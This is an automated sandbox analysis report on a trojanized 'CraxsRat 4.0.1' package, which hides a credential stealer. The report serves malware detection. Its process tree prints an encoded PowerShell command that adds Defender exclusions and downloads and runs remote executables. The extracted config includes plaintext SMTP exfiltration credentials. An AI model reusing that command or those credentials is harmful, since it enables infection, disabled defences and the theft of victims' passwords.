Overview
overview
10Static
static
7CraxsRat 4...me.dll
windows10-2004-x64
1CraxsRat 4....1.exe
windows10-2004-x64
10CraxsRat 4...xe.xml
windows10-2004-x64
1CraxsRat 4...rk.dll
windows10-2004-x64
1CraxsRat 4...ys.dll
windows10-2004-x64
1CraxsRat 4...ms.dll
windows10-2004-x64
1CraxsRat 4...pf.dll
windows10-2004-x64
1CraxsRat 4...ts.dll
windows10-2004-x64
1CraxsRat 4...UI.dll
windows10-2004-x64
1CraxsRat 4...io.dll
windows10-2004-x64
1CraxsRat 4...le.dll
windows10-2004-x64
1CraxsRat 4...on.dll
windows10-2004-x64
1CraxsRat 4...et.dll
windows10-2004-x64
1CraxsRat 4...ib.dll
windows10-2004-x64
1Analysis
-
max time kernel
61s -
max time network
65s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
02-05-2023 17:25
Behavioral task
behavioral1
Sample
CraxsRat 4.0.1/AgileDotNet.VMRuntime.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral2
Sample
CraxsRat 4.0.1/CraxsRat 4.0.1.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
CraxsRat 4.0.1/CraxsRat.exe.xml
Resource
win10v2004-20230220-en
Behavioral task
behavioral4
Sample
CraxsRat 4.0.1/DrakeUI.Framework.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
CraxsRat 4.0.1/GeoIPCitys.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral6
Sample
CraxsRat 4.0.1/LiveCharts.WinForms.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
CraxsRat 4.0.1/LiveCharts.Wpf.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral8
Sample
CraxsRat 4.0.1/LiveCharts.dll
Resource
win10v2004-20230221-en
Behavioral task
behavioral9
Sample
CraxsRat 4.0.1/MetroSet UI.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral10
Sample
CraxsRat 4.0.1/NAudio.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
CraxsRat 4.0.1/System.IO.Compression.ZipFile.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral12
Sample
CraxsRat 4.0.1/Vip.Notification.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
CraxsRat 4.0.1/WinMM.Net.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral14
Sample
CraxsRat 4.0.1/mscorlib.dll
Resource
win10v2004-20230220-en
General
-
Target
CraxsRat 4.0.1/CraxsRat 4.0.1.exe
-
Size
3.6MB
-
MD5
c03340af767421ec0ee35c378bbf3edb
-
SHA1
63060366f0bf2b4dcff3974deffca94b472b8773
-
SHA256
1dd45e5c7521156d2ca52d7aa5024e9fd3580ff6814a4b79161d7d730ecdb7ab
-
SHA512
70863a2729baa254fc5d0b92a8631e98596bb2ad497a5e607328cc49e32e254ec1f4309c8c085983cd70e2141be09d0429568f2aace061644c3d2d59ee39ab7f
-
SSDEEP
49152:7WsTEkwghTKv4jysGUqgCoOtt1JKsgGViSe8KuAfG9b/KMA:7FEkwghTKv4jysGUqgCxttdX8v/Ee
Malware Config
Extracted
https://rentry.org/xau9i/raw
Extracted
Protocol: smtp- Host:
smtp.zoho.com - Port:
587 - Username:
nexusbuscasg@zohomail.com - Password:
Nescau71#
Signatures
-
NirSoft MailPassView 4 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp MailPassView behavioral2/memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 4 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp WebBrowserPassView behavioral2/memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView -
Nirsoft 7 IoCs
Processes:
resource yara_rule behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp Nirsoft behavioral2/memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 15 2916 powershell.exe 17 2916 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
LX.exeCraxsRat 4.0.1.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation LX.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation CraxsRat 4.0.1.exe -
Drops startup file 1 IoCs
Processes:
CraxsRat 4.0.1.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk CraxsRat 4.0.1.exe -
Executes dropped EXE 5 IoCs
Processes:
CraxsRat 4.0.1.exeLX.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exepid process 1424 CraxsRat 4.0.1.exe 4436 LX.exe 3608 CraxsRat 4.0.1.exe 1372 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
CraxsRat 4.0.1.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" CraxsRat 4.0.1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 whatismyipaddress.com 20 whatismyipaddress.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
CraxsRat 4.0.1.exeCraxsRat 4.0.1.exedescription pid process target process PID 1424 set thread context of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 2708 set thread context of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 set thread context of 4728 2708 CraxsRat 4.0.1.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exepid process 2916 powershell.exe 2916 powershell.exe 1424 CraxsRat 4.0.1.exe 1424 CraxsRat 4.0.1.exe 1424 CraxsRat 4.0.1.exe 1424 CraxsRat 4.0.1.exe 4440 powershell.exe 4440 powershell.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe 2708 CraxsRat 4.0.1.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exedescription pid process Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 1424 CraxsRat 4.0.1.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 2708 CraxsRat 4.0.1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
CraxsRat 4.0.1.exepid process 2708 CraxsRat 4.0.1.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
CraxsRat 4.0.1.exeLX.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exedescription pid process target process PID 4264 wrote to memory of 1424 4264 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 4264 wrote to memory of 1424 4264 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 4264 wrote to memory of 1424 4264 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 4264 wrote to memory of 4436 4264 CraxsRat 4.0.1.exe LX.exe PID 4264 wrote to memory of 4436 4264 CraxsRat 4.0.1.exe LX.exe PID 4436 wrote to memory of 2916 4436 LX.exe powershell.exe PID 4436 wrote to memory of 2916 4436 LX.exe powershell.exe PID 1424 wrote to memory of 3608 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 3608 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 3608 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 1372 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 1372 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 1372 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 1424 wrote to memory of 2708 1424 CraxsRat 4.0.1.exe CraxsRat 4.0.1.exe PID 2916 wrote to memory of 4440 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 4440 2916 powershell.exe powershell.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 1408 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe PID 2708 wrote to memory of 4728 2708 CraxsRat 4.0.1.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"4⤵
-
C:\Users\Admin\AppData\Local\Temp\LX.exe"C:\Users\Admin\AppData\Local\Temp\LX.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAZgBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAbQBtACMAPgA7ACIAOwA8ACMAcwBxAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAGcAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB0AGgAZwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAHgAYQAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeABhAHUAOQBpAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAHoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGIAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGgAaQBsACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exeFilesize
3.4MB
MD5f873bee92e6118ff16b63b2a75173818
SHA14061cab004813a12e8042b83228885dfbc88547f
SHA2567eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exeFilesize
3.4MB
MD5f873bee92e6118ff16b63b2a75173818
SHA14061cab004813a12e8042b83228885dfbc88547f
SHA2567eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exeFilesize
3.4MB
MD5f873bee92e6118ff16b63b2a75173818
SHA14061cab004813a12e8042b83228885dfbc88547f
SHA2567eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exeFilesize
3.4MB
MD5f873bee92e6118ff16b63b2a75173818
SHA14061cab004813a12e8042b83228885dfbc88547f
SHA2567eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exeFilesize
3.4MB
MD5f873bee92e6118ff16b63b2a75173818
SHA14061cab004813a12e8042b83228885dfbc88547f
SHA2567eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exeFilesize
3.4MB
MD5f873bee92e6118ff16b63b2a75173818
SHA14061cab004813a12e8042b83228885dfbc88547f
SHA2567eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
-
C:\Users\Admin\AppData\Local\Temp\LX.exeFilesize
74KB
MD51ab3092297d1806397e8d3a6747a3271
SHA1ea114a2e5ddee915d30458031ec5ced7f97d1650
SHA2562aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e
SHA5121ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28
-
C:\Users\Admin\AppData\Local\Temp\LX.exeFilesize
74KB
MD51ab3092297d1806397e8d3a6747a3271
SHA1ea114a2e5ddee915d30458031ec5ced7f97d1650
SHA2562aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e
SHA5121ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28
-
C:\Users\Admin\AppData\Local\Temp\LX.exeFilesize
74KB
MD51ab3092297d1806397e8d3a6747a3271
SHA1ea114a2e5ddee915d30458031ec5ced7f97d1650
SHA2562aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e
SHA5121ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ia4ulzyi.sfh.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\holderwb.txtFilesize
3KB
MD5f94dc819ca773f1e3cb27abbc9e7fa27
SHA19a7700efadc5ea09ab288544ef1e3cd876255086
SHA256a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA51272a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196
-
memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1424-160-0x00000000053C0000-0x0000000005964000-memory.dmpFilesize
5.6MB
-
memory/1424-157-0x0000000000070000-0x00000000003E0000-memory.dmpFilesize
3.4MB
-
memory/1424-159-0x0000000004D70000-0x0000000004E0C000-memory.dmpFilesize
624KB
-
memory/2708-200-0x0000000008AB0000-0x0000000008B16000-memory.dmpFilesize
408KB
-
memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/2708-223-0x0000000005650000-0x0000000005660000-memory.dmpFilesize
64KB
-
memory/2708-212-0x0000000005650000-0x0000000005660000-memory.dmpFilesize
64KB
-
memory/2708-179-0x0000000005450000-0x00000000054E2000-memory.dmpFilesize
584KB
-
memory/2708-208-0x0000000005650000-0x0000000005660000-memory.dmpFilesize
64KB
-
memory/2708-192-0x0000000005320000-0x000000000532A000-memory.dmpFilesize
40KB
-
memory/2708-193-0x00000000055E0000-0x0000000005636000-memory.dmpFilesize
344KB
-
memory/2708-194-0x0000000005650000-0x0000000005660000-memory.dmpFilesize
64KB
-
memory/2916-210-0x000001E14D650000-0x000001E14D660000-memory.dmpFilesize
64KB
-
memory/2916-172-0x000001E14D650000-0x000001E14D660000-memory.dmpFilesize
64KB
-
memory/2916-171-0x000001E14D650000-0x000001E14D660000-memory.dmpFilesize
64KB
-
memory/2916-170-0x000001E14D5E0000-0x000001E14D602000-memory.dmpFilesize
136KB
-
memory/2916-211-0x000001E14D650000-0x000001E14D660000-memory.dmpFilesize
64KB
-
memory/2916-180-0x000001E14D650000-0x000001E14D660000-memory.dmpFilesize
64KB
-
memory/2916-209-0x000001E14D650000-0x000001E14D660000-memory.dmpFilesize
64KB
-
memory/4264-156-0x0000000000400000-0x000000000079B000-memory.dmpFilesize
3.6MB
-
memory/4436-155-0x00000000005A0000-0x00000000005B8000-memory.dmpFilesize
96KB
-
memory/4440-195-0x00000241C7E50000-0x00000241C7E60000-memory.dmpFilesize
64KB
-
memory/4440-181-0x00000241C7E50000-0x00000241C7E60000-memory.dmpFilesize
64KB
-
memory/4440-190-0x00000241C7E50000-0x00000241C7E60000-memory.dmpFilesize
64KB
-
memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmpFilesize
352KB
-
memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmpFilesize
352KB
-
memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmpFilesize
352KB